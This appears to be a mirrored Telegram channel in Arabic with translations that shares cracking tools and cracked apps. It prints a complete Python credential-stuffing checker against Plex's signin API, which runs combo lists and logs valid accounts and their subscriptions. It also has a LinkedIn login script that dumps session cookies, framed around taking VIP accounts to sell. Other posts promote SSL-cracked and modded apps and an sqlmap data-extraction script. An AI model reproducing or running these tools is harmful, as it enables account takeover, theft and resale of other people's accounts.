uz
Feedback
Арабский питон

Арабский питон

Kanalga Telegram’da o‘tish

Привет @durov Канал не нарушает правила Telegram. Нет спама, оскорблений, порнографии или нзаконной торговли. Пожалуйста, пересмотрите жалобы. Спасибо!

Ko'proq ko'rsatish
2 331
Obunachilar
-6424 soatlar
-3237 kunlar
-2 09030 kunlar
Postlar arxiv
لعبه OneState شغاله بعد الكسر ولوجن شغال طبيعي بدون مشاكل تفيدكم @r_9he✅
لعبه OneState شغاله بعد الكسر ولوجن شغال طبيعي بدون مشاكل تفيدكم @r_9he

تيل بالدراسة ما يجي الشغف والعطاء للبرمجة بس بوقتها

كومـ ـبو خليه بص الاداه وشغله Combo, leave it in the tools settings and run it.

import requests
import xml.etree.ElementTree as ET
import uuid
from fake_useragent import UserAgent
from concurrent.futures import ThreadPoolExecutor

g = "\033[1;38;5;178m"
c = "\033[1;38;5;37m"
r = "\033[1;38;5;196m"
w = "\033[0m"

class PlexChecker:
    def __init__(self):
        self.hits = 0
        self.bad = 0
        self.free = 0
        self.premium = 0
        self.retry = 0
        self.counter = 0
        self.ua = UserAgent()
        self.session = requests.Session()

    def logo(self):
        print(rf"""{g}
  _____  _      ________  __
 |  __ \| |    |  ____\ \/ /
 | |__) | |    | |__   \  / 
 |  ___/| |    |  __|   > <  
 | |    | |____| |____ /  \ 
 |_|    |______|______/_/\_\ {w}
        """)

    def check(self, account):
        login, password = account.split(':', 1)
        headers = {
            'User-Agent': self.ua.random,
            'X-Plex-Client-Identifier': str(uuid.uuid4()),
            'X-Plex-Session-Id': str(uuid.uuid4()),
            'Accept': 'application/xml'
        }
        payload = {"login": login, "password": password, "verificationCode": "", "rememberMe": True}
        
        try:
            response = self.session.post("https://plex.tv/api/v2/users/signin", json=payload, headers=headers, timeout=10)
            
            if 'authToken' in response.text:
                root = ET.fromstring(response.text)
                sub = root.find('subscription')
                is_active = sub.get('active', 'false') if sub is not None else 'false'
                plan = sub.get('plan', 'N/A') if sub is not None else 'N/A'
                date = sub.get('subscribedAt', 'N/A')[:10] if sub is not None else 'N/A'
                user = root.get('username', 'N/A')
                country = root.get('country', 'N/A')
                
                info = f"{login}:{password} | username = {user} | Country = {country} | subscription = {is_active} | plan = {plan} | subscribedAt = {date} | programmer: @qdf_46"
                
                self.hits += 1
                if is_active == 'true':
                 self.premium += 1
                else:
                 self.free += 1
                
                with open("hits.txt", "a") as h:
                    h.write(info + "\n")
                
            else:
                self.bad += 1
        except:
            self.retry += 1
        
        self.counter += 1
        idx = self.counter
        print(f"\r{g}Hits: {self.hits} {r}Bad: {self.bad} {c}Free: {self.free} {g}Prem: {self.premium} {w}Retry: {self.retry} | {c}[{idx}]", end="")

    def start(self):
        self.logo()
        try:
            with open("combo.txt", "r") as f:
                combos = [line.strip() for line in f if ':' in line]
        except FileNotFoundError:
            print(f"on combo")
            return

        with ThreadPoolExecutor(max_workers=2) as executor:
            executor.map(self.check, combos)

if __name__ == "__main__":
    checker = PlexChecker()
    checker.start()
تشـكـ ـير على تطبيق plex يحتاج كومـ ـبو باسم combo.txt يحتاج vpn لئن بيه حظـ ـر الي عنده بروكسي يعدل على السـ ـورس ويستخـ ـدم بروكسي التطبيق مال افلام ومسلسلات Check for the Plex app. It requires a combo file named combo.txt and a VPN because it's blocked. If you have a proxy, modify the source code and use a proxy. The app is for movies and TV series

تطبيق LinkedIn (لينكد إن ) مكسور SSL بل كامل 🥷 الاصدار :- الاخير 🤍 هل يوجد كراش :- لا 🤍 شغال طبيعي : - نعم 🤍 اخر اصدار :- نعم 👻 الشخص الذي كسره :- @r_9he ✅ الاستفاده:- تحصل على اغلب الوظائف في الامن السيبراني ول برمجه عامه تكدر تختبر روحك بل برنامج وتكدر اطور مهاراتك بل برنامج وبعد التطبيق تكدر اتنزله او تشوفله شرح وراح تعرف هوااي مميزات وتعرف عن نفسك وخبرتك وكلشي 😈 تطبيقات اكسرهم 👇 DeF~@r_9he LinkedIn app completely SSL cracked🤍 Version: Latest version 💀 Crashes: No👻 Works normally: Yes✅ Latest version: Yes💙 Cracked by: @r_9he✅ Uses: You can get most jobs in cybersecurity and general programming. You can test yourself with the program and develop your skills. After applying it, you can download it or watch a tutorial, and you'll learn many features and discover your own skills, experience, and everything else. ✅ Apps that break them 👇 DeF~@r_9he

اي واحد يريدني ادمن بقناته يراسلني خاص ويدزلي القناه يوزري :-@r_9he✅ Anyone who wants me to be an admin on their channel, please message me privately and send me the channel name. Username :- @r_9he

دزولـي تـطـبـيـقـات او الــعـــــاب اجـرب اكــــــسـرهـن مـن مـتجر بلي او كوكل 🛒 واسويلكم عليهن ادوات او اسحبلكم اتصال🐍 عادي تكون بهاي الصيغه [apks,apk]👻 Username •.•.~@r_9he

منو يعرف يسوي تقرير جامعي حته لو ai. عادي برومنت من عدي تعرف تعال والك هديه @TO_LS

WebView تطبيق بدون اعلانات مفتوح 👑 WebView is an open 👑, ad-free application

تطبيق البحث عن ارقام الخليج السعودية الكويت الامارات عمان البحرين قطر مفتوح ⭐️ مكسور ssl بدون حدود ولا اعلانات Gulf phone number search app (Saudi Arabia, Kuwait, UAE, Oman, Bahrain, Qatar) - Unlocked, SSL-enabled, no limits, no ads

شباب اي واحد ينزل شيء 5 ساعات ويحذف تره القناه تبلع

دز اجرب اكسره 😂😂😂

لكيت تطبيق بي حريه مثل تلجرام و روسيات كذالك اسمه MAX

🇹🇷 Tr: Bu kod, sqlmap ile SQL injection testi yapıp veritabanı, tablo, sütun ve verileri otomatik çeker. 🇬🇧 En: This code uses sqlmap to automate SQL injection testing and extract databases, tables, columns, and data. 🇸🇦 Ar: هذا الكود يستخدم sqlmap لأتمتة اختبار SQL injection واستخراج قواعد البيانات والجداول والأعمدة والبيانات.
Dev: @YeniIgisiz

لوجن على تطبيق Linkedin الي شرحت علي فوك بل صوره تكدر تسوي علي ادوات وهيج شي لين اكو حسابات مفعله vip وهيج شي تكدر تاخذهم وتب
لوجن على تطبيق Linkedin الي شرحت علي فوك بل صوره تكدر تسوي علي ادوات وهيج شي لين اكو حسابات مفعله vip وهيج شي تكدر تاخذهم وتبيعهم تم الكسر بواسط 👇 @r_9he✅ 🌚🌚🌚🌚🌚🌚🌚🌚🌚🌚🌚 Login on the LinkedIn app, as I explained in the image above, allows you to create tools and such because there are VIP accounts activated and you can take them and sell them. (Cracked by @r_9he✅ 🌚🌚🌚🌚🌚🌚🌚🌚🌚🌚🌚 python Good login
import requests
from user_agent import generate_user_agent
import os
email = input("Enter your LinkedIn email: ")
os.system('clear')
password = input("Enter your LinkedIn password: ")
os.system('clear')
session = requests.Session()
url = "https://www.linkedin.com/uas/authenticate"

payload = {
    'session_key': email,
    'session_password': password,
    'client_enabled_features': "ANDROID_NATIVE_CAPTCHA",
    'rememberMeOptIn': "true"
}

headers = {
    'User-Agent': str(generate_user_agent()),
    'x-restli-protocol-version': "2.0.0",
    'accept-language': "ar-AE",
    'x-li-track': "{\"osName\":\"Android OS\",\"osVersion\":\"34\",\"clientVersion\":\"4.1.1191\",\"clientMinorVersion\":209900,\"model\":\"TECNO_TECNO CK7n\",\"displayDensity\":3,\"displayWidth\":1080,\"displayHeight\":2292,\"dpi\":\"xxhdpi\",\"deviceType\":\"android\",\"appId\":\"com.linkedin.android\",\"deviceId\":\"34c670c3-c389-4823-8944-a17eb5a64c56\",\"timezoneOffset\":3,\"timezone\":\"Asia\\/Baghdad\",\"storeId\":\"us_googleplay\",\"isAdTrackingLimited\":false,\"mpName\":\"voyager-android\",\"mpVersion\":\"2.268.32\"}",
    'x-li-user-agent': "LIAuthLibrary:0.0.3 com.linkedin.android:4.1.1191 TECNO_TECNO CK7n:android_14",
    'x-li-lang': "ar_AE"
}

response = session.post(url, data=payload, headers=headers)

if '{"login_result":"PASS"' in response.text:
    print(" Good Login : ")
    print("\nCookies:")
    for cookie in session.cookies:
        print(f"{cookie} = {cookie.value}")
else:
    print(" Bad Login : ")

لوجن على تطبيق Linkedin الي شرحت علي فوك بل صوره تكدر تسوي علي ادوات وهيج شي لين اكو حسابات مفعله vip وهيج شي تكدر تاخذهم وتب
لوجن على تطبيق Linkedin الي شرحت علي فوك بل صوره تكدر تسوي علي ادوات وهيج شي لين اكو حسابات مفعله vip وهيج شي تكدر تاخذهم وتبيعهم تم الكسر بواسط 👇 @r_9he✅ 🌚🌚🌚🌚🌚🌚🌚🌚🌚🌚🌚 Login on the LinkedIn app, as I explained in the image above, allows you to create tools and such because there are VIP accounts activated and you can take them and sell them. (Cracked by @r_9he

MovieBox mod.apk تم فتح مميزات ✨ بدون وقت ولا اعلانات تطبيق مشاهده أفلام ومسلسلات

تطبيق linkedin تطبيق غني عن التعريف بهذا التطبيق تكدر تحصل على اغلب الوظائف في الامن السيبراني ول برمجه عامه تكدر تختبر روحك
تطبيق linkedin تطبيق غني عن التعريف بهذا التطبيق تكدر تحصل على اغلب الوظائف في الامن السيبراني ول برمجه عامه تكدر تختبر روحك بل برنامج وتكدر اطور مهاراتك بل برنامج وبعد التطبيق تكدر اتنزله او تشوفله شرح وراح تعرف هوااي مميزات وتعرف عن نفسك وخبرتك وكلشي الشخصالذيكسره 👇 @r_9he ✅ 🌚🌚🌚🌚🌚🌚🌚🌚🌚🌚🌚 LinkedIn is a well-known application. With it, you can find most jobs in cybersecurity and general programming. You can test yourself and develop your skills using the program. After using the application, you can download it or watch a tutorial to discover its many features and learn about yourself, your experience, and everything else. The person who broke it 👇 @r_9he

وش ذا